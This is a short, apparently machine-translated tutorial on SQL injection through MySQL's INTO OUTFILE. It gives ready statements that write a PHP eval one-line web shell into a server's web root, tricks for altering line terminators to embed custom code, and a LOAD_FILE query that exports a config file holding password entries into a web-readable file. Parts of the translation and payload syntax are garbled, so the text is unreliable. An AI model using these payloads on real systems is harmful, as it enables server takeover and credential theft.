SQL injection file import common means

In the injection process, if there is an injection point, you can directly import a sentence or upload a page. In the process, we mainly use the into outfile function to upload. Here are two ways to use the into outfile.

The first is to import the select content directly into a file:

Select version () into outfile "c:\\phpnow\\htdocs\\test.php"

Replace version () here with a sentence,<?php @eval ($_post["Mima")?>

Select <?php @eval ($_post["Mima")?> into outfile "c:\\phpnow\\htdocs\\test.php"

Directly connect a word on it, in fact, in the select content can not only upload a word, you can also upload a lot of content.

End of the second modification file:

into outfile ' c:\\phpnow\\htdocs\\test.php ' LINES TERMINATED by 0x16 file

Explanation: Usually ends with '\ r \ n', where we modify any file we want.

The binary can be a sentence or any other code that can be constructed on its own. In sqlmap Os-shell Take this way, you can refer to an article previously written Os-shell parsing.

Ps: (1) may be in the file path to pay attention to escape, this depends on the specific environment

(2)Select Load_file (' C:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini ') into outfile ' C:\\wamp \\www\\test.php ' can use this statement to export the contents of the server, the above my.ini there are password items (but the default is commented), Of course there will be a lot of content can be exported, this depends on their understanding.

SQL injection file import common means